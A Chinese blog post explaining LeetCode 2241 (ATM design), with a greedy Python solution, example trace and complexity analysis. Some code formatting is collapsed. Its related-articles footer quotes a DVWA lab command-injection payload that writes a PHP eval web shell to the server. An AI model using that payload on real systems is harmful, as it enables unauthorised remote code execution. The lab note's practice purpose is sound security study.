# 设计一个 ATM 机器(LeetCode 第2241题)

设计一个 ATM 机器(LeetCode 第2241题)

在本篇博客中,我们将深入探讨如何设计一个 ATM 机器,以满足存取钞票的需求。这个问题来源于 LeetCode 的第2241题,旨在考察如何高效地管理不同面额的钞票并处理用户的存取请求。

问题描述

背景

设计一个 ATM 机器,该机器存有 5 种面值的钞票:$20、$50、$100、$200 和 $500 美元。初始时,ATM 机是空的。用户可以通过该机器进行存款或取款操作。

取款规则

  • 优先取出大面额钞票:在取款时,ATM 会优先取出较大面额的钞票,以减少取款的张数。
  • 精确取款:如果无法通过可用的钞票组合精确取出所需金额,则取款请求将被拒绝。

具体要求

请实现一个 ATM 类,支持以下操作:

  • ATM(): 初始化 ATM 对象。
  • deposit(int[] banknotesCount): 存入 5 种面额的钞票数量,依次为 $20、$50、$100、$200 和 $500。
  • withdraw(int amount): 尝试取出指定金额的钞票,返回一个长度为 5 的数组,表示每种面额钞票的数量。如果无法完成取款,则返回 [-1]

示例

输入:
["ATM", "deposit", "withdraw", "deposit", "withdraw", "withdraw"]
[[], [[0,0,1,2,1]], [600], [[0,1,0,1,1]], [600], [550]]
输出:
[null, null, [0,0,1,0,1], null, [-1], [0,1,0,0,1]]

解释

ATM atm = new ATM();
atm.deposit([0,0,1,2,1]); // 存入 1 张 $1002 张 $2001 张 $500 的钞票。
atm.withdraw(600);        // 返回 [0,0,1,0,1]。机器取出 1 张 $1001 张 $500 的钞票。
atm.deposit([0,1,0,1,1]); // 存入 1 张 $501 张 $2001 张 $500 的钞票。
atm.withdraw(600);        // 返回 [-1]。无法精确取出 600 美元。
atm.withdraw(550);        // 返回 [0,1,0,0,1],取出 1 张 $501 张 $500 的钞票。

解决方案

数据结构选择

为了高效管理钞票,我们使用一个数组来表示不同面额钞票的数量。具体来说:

  • 定义钞票面额数组 DENOMINATIONS = [20, 50, 100, 200, 500]
  • 使用数组 banknotes 来存储每种面额的钞票数量,索引与 DENOMINATIONS 对应。

操作实现

存款操作 (deposit)

存款操作相对简单,只需将输入数组中的钞票数量累加到 banknotes 对应的位置。

取款操作 (withdraw)

取款操作需要考虑以下几点:

  1. 优先取出大面额钞票:从高到低遍历 DENOMINATIONS,尽可能多地取出当前面额的钞票。
  2. 确保取款金额精确:在取出钞票的过程中,需实时更新剩余金额,并确保最终能精确取出所需金额。
  3. 回滚机制:如果在取款过程中发现无法精确取出所需金额,应回滚所有取出的钞票,确保 ATM 状态不变。

代码实现

以下是基于上述思路的 Python 实现:

from typing import List# 定义钞票面额
DENOMINATIONS = [20, 50, 100, 200, 500]
KINDS = len(DENOMINATIONS)class ATM:def __init__(self):# 初始化每种面额的钞票数量为0self.banknotes = [0] * KINDSdef deposit(self, banknotesCount: List[int]) -> None:"""存入钞票,banknotesCount按面额顺序依次对应20, 50, 100, 200, 500"""for i, count in enumerate(banknotesCount):self.banknotes[i] += countprint(f"存款后钞票状态: {self.banknotes}")def withdraw(self, amount: int) -> List[int]:"""尝试取出指定金额的钞票,返回取出各面额的数量数组或[-1]表示失败"""ans = [0] * KINDSremaining = amount# 从大面额开始取for i in range(KINDS - 1, -1, -1):if remaining >= DENOMINATIONS[i]:# 计算当前面额最多可取出的钞票数量max_can_take = remaining // DENOMINATIONS[i]take = min(max_can_take, self.banknotes[i])ans[i] = takeremaining -= take * DENOMINATIONS[i]print(f"取出 {DENOMINATIONS[i]} 美元: {ans[i]} 张, 剩余金额: {remaining}")# 如果无法精确取出所需金额,返回 [-1]if remaining != 0:print(f"取款失败,无法取出 {amount} 美元")return [-1]# 更新钞票数量for i in range(KINDS):self.banknotes[i] -= ans[i]print(f"取款后钞票状态: {self.banknotes}")return ans

代码解析

  1. 初始化

    def __init__(self):self.banknotes = [0] * KINDS
    

    初始化时,ATM 中所有面额的钞票数量均为0。

  2. 存款操作

    def deposit(self, banknotesCount: List[int]) -> None:for i, count in enumerate(banknotesCount):self.banknotes[i] += countprint(f"存款后钞票状态: {self.banknotes}")
    

    遍历输入的 banknotesCount 数组,将每种面额的钞票数量累加到 self.banknotes 中。

  3. 取款操作

    def withdraw(self, amount: int) -> List[int]:ans = [0] * KINDSremaining = amountfor i in range(KINDS - 1, -1, -1):if remaining >= DENOMINATIONS[i]:max_can_take = remaining // DENOMINATIONS[i]take = min(max_can_take, self.banknotes[i])ans[i] = takeremaining -= take * DENOMINATIONS[i]print(f"取出 {DENOMINATIONS[i]} 美元: {ans[i]} 张, 剩余金额: {remaining}")if remaining != 0:print(f"取款失败,无法取出 {amount} 美元")return [-1]for i in range(KINDS):self.banknotes[i] -= ans[i]print(f"取款后钞票状态: {self.banknotes}")return ans
    
    • 初始化ans 用于记录每种面额取出的钞票数量,remaining 用于跟踪剩余金额。
    • 取钞逻辑:从大到小遍历面额,尽可能多地取出当前面额的钞票,同时更新剩余金额。
    • 失败检查:如果在遍历结束后,remaining 不为0,表示无法精确取出所需金额,返回 [-1]
    • 更新钞票数量:如果取款成功,更新 self.banknotes 中的钞票数量。
    • 返回结果:返回 ans 数组,表示取出的各面额钞票数量。

运行示例

以下是一个运行示例,展示了如何使用 ATM 类:

# 初始化ATM
atm = ATM()# 存入1张$100,2张$200,1张$500
atm.deposit([0, 0, 1, 2, 1])  # 存款后钞票状态: [0, 0, 1, 2, 1]# 取出600美元
print(atm.withdraw(600))      # 输出: [0,0,1,0,1], 取款后钞票状态: [0,0,0,2,0]# 存入1张$50,1张$200,1张$500
atm.deposit([0, 1, 0, 1, 1])  # 存款后钞票状态: [0,1,0,3,1]# 尝试取出600美元
print(atm.withdraw(600))      # 输出: [-1], 取款失败,无法取出600美元# 取出550美元
print(atm.withdraw(550))      # 输出: [0,1,0,0,1], 取款后钞票状态: [0,0,0,3,0]

输出结果

存款后钞票状态: [0, 0, 1, 2, 1]
取出 500 美元: 1 张, 剩余金额: 100
取出 200 美元: 0 张, 剩余金额: 100
取出 100 美元: 1 张, 剩余金额: 0
取出 50 美元: 0 张, 剩余金额: 0
取出 20 美元: 0 张, 剩余金额: 0
取款后钞票状态: [0, 0, 0, 2, 0]
[0, 0, 1, 0, 1]
存款后钞票状态: [0, 1, 0, 3, 1]
取出 500 美元: 1 张, 剩余金额: 100
取出 200 美元: 0 张, 剩余金额: 100
取出 100 美元: 0 张, 剩余金额: 100
取出 50 美元: 0 张, 剩余金额: 100
取出 20 美元: 0 张, 剩余金额: 100
取款失败,无法取出 600 美元
[-1]
取出 500 美元: 1 张, 剩余金额: 50
取出 200 美元: 0 张, 剩余金额: 50
取出 100 美元: 0 张, 剩余金额: 50
取出 50 美元: 1 张, 剩余金额: 0
取出 20 美元: 0 张, 剩余金额: 0
取款后钞票状态: [0, 0, 0, 3, 0]
[0, 1, 0, 0, 1]

复杂度分析

  • 时间复杂度

    • deposit 操作的时间复杂度为 O(1),因为面额种类固定为5。
    • withdraw 操作的时间复杂度同样为 O(1)。
  • 空间复杂度

    • 使用了固定大小的数组 banknotesans,空间复杂度为 O(1)。

总结

通过使用贪心算法,我们能够有效地管理 ATM 机器中的钞票,并满足用户的存取需求。然而,需要注意的是,贪心算法在某些情况下可能无法满足取款金额的精确要求。因此,在实现时,我们需要在取款后进行剩余金额的检查,以确保取款的合法性和准确性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/66237.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

操作系统复习(理论版)

目录 只会在选择填空出现类型 第一章:操作系统导论 操作系统介绍 不得不知道的概念 可能出现在答题的类型 第二章:进程调度 进程管理: 处理机调度: 进程同步: 死锁: 预防死锁: 避免死…

概述(讲讲python基本语法和第三方库)

我是北子,这是我自己写的python教程,主要是记录自己的学习成果方便自己日后复习, 我先学了C/C,所以这套教程中可能会将很多概念和C/C去对比,所以该教程大概不适合零基础的人。 it seems that python nowadays 只在人工…

Linux(Centos 7.6)命令详解:ls

1.命令作用 列出目录内容(list directory contents) 2.命令语法 Usage: ls [OPTION]... [FILE]... 3.参数详解 OPTION: -l,long list 使用长列表格式-a,all 不忽略.开头的条目(打印所有条目,包括.开头的隐藏条目&#xff09…

改善 Kibana 中的 ES|QL 编辑器体验

作者:来自 Elastic Marco Liberati 随着新的 ES|QL 语言正式发布,Kibana 中开发了一种新的编辑器体验,以帮助用户编写更快、更好的查询。实时验证、改进的自动完成和快速修复等功能将简化 ES|QL 体验。 我们将介绍改进 Kibana 中 ES|QL 编辑器…

基于Spring Boot的紧急物资管理系统

基于Spring Boot的紧急物资管理系统是一个非常实用的应用,特别是在应对自然灾害、公共卫生事件等情况下。该系统可以帮助管理者有效地追踪和分配物资,确保资源能够及时到达需要的地方。以下是一个基本的实现思路和一些关键组件: 项目规划 需…

机器学习基础-概率图模型

(一阶)马尔科夫模型的基本概念 状态、状态转换概率、初始概率 状态转移矩阵的基本概念 隐马尔可夫模型(HMM)的基本概念 条件随机场(CRF)的基本概念 实际应用中的马尔科夫性 自然语言处理: 在词…

Qt打包为exe文件

个人学习笔记 选择release 进入项目文件夹,查看releas生成的文件 releas文件路径 进入release看到exe文件,但是无法执行 将exe文件单独放到一个文件夹内 选择MinGW 用CD 进入存放exe文件的路径,输入下面指令 cd J:\C\Qt\test4-3-1 windeploy…

VScode怎么重启

原文链接:【vscode】vscode重新启动 键盘按下 Ctrl Shift p 打开命令行,如下图: 输入Reload Window,如下图:

Web安全 - “Referrer Policy“ Security 头值不安全

文章目录 概述原因分析风险说明Referrer-Policy 头配置选项1. 不安全的策略no-referrer-when-downgradeunsafe-url 2. 安全的策略no-referreroriginorigin-when-cross-originsame-originstrict-originstrict-origin-when-cross-origin 推荐配置Nginx 配置示例 在 Nginx 中配置 …

Hyperbolic dynamics

http://www.scholarpedia.org/article/Hyperbolic_dynamics#:~:textAmong%20smooth%20dynamical%20systems%2C%20hyperbolic%20dynamics%20is%20characterized,semilocal%20or%20even%20global%20information%20about%20the%20dynamics. 什么是双曲动力系统? A hy…

基于SpringBoot在线竞拍平台系统功能实现十五

一、前言介绍: 1.1 项目摘要 随着网络技术的飞速发展和电子商务的普及,竞拍系统作为一种新型的在线交易方式,已经逐渐深入到人们的日常生活中。传统的拍卖活动需要耗费大量的人力、物力和时间,从组织拍卖、宣传、报名、竞拍到成…

Ubuntu 搭建SVN服务

目录 ​ 1、安装SVN服务端 2、创建SVN版本库 3、修改SVN配置svnserve.conf 3.1 配置文件介绍 3.2 svnserve.conf配置 3.3 authz配置设置用户读写权限 3.4 passwd配置 用户名密码 4、启动SVN服务 4.1 配置开机启动 1、安装SVN服务端 sudo apt-get install subversion…

DataV数据可视化

阿里云 DataV 是一个强大的数据可视化工具,可以帮助用户通过创建丰富的图表、仪表盘、地图和互动视图,将复杂的数据转化为易于理解和分析的可视化信息。DataV主要用于大数据和实时数据的展示,可以帮助企业和个人更直观地理解数据背后的含义&a…

电子电气架构 --- 整车整车网络管理浅析

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 所谓鸡汤,要么蛊惑你认命,要么怂恿你拼命,但都是回避问题的根源,以现象替代逻辑,以情绪代替思考,把消极接受现实的懦弱,伪装成乐观面对不幸的…

面试题解,Java中的“对象”剖析

一、说一说JVM中对象的内存布局?new一个对象到底占多大内存? 话不多说,看下图,对象的内存布局图 一个对象的内存布局主要由三部分组成:对象头(Object Header)、实例数据(Instance D…

DVWA 命令注入写shell记录

payload 127.0.0.1;echo "<?php eval($_POST["md"]);?>" > md.php 成功写入&#xff0c;访问查看 成功解析

MySQL(五)MySQL图形化工具-Navicat

1. MySQL图形化工具-Navicat Navicat是一套快速、可靠的数据库管理工具&#xff0c;Navicat是以直觉化的图形用户界面而建的&#xff0c;可以兼容多种数据库&#xff0c;支持多种操作系统。   Navicat for MySQL是一款强大的 MySQL 数据库管理和开发工具&#xff0c;它为专业…

非关系型数据库和关系型数据库的区别

&#x1f90d; 前端开发工程师、技术日更博主、已过CET6 &#x1f368; 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 &#x1f560; 牛客高级专题作者、打造专栏《前端面试必备》 、《2024面试高频手撕题》 &#x1f35a; 蓝桥云课签约作者、上架课程《Vue.js 和 E…

信息科技伦理与道德1:绪论

1 问题描述 1.1 信息科技的进步给人类生活带来的是什么呢&#xff1f; 功能&#xff1f;智能&#xff1f;陪伴&#xff1f;乐趣&#xff1f;幸福&#xff1f; 基于GPT-3的对话Demo DeepFake 深伪技术&#xff1a;通过神经网络技术进行大样本学习&#xff0c;将个人的声音、面…

iOS 11 中的 HEIF 图像格式 - 您需要了解的内容

HEIF&#xff0c;也称为高效图像格式&#xff0c;是iOS 11 之后发布的新图像格式&#xff0c;以能够在不压缩图像质量的情况下以较小尺寸保存照片而闻名。换句话说&#xff0c;HEIF 图像格式可以具有相同或更好的照片质量&#xff0c;同时比 JPEG、PNG、GIF、TIFF 占用更少的设…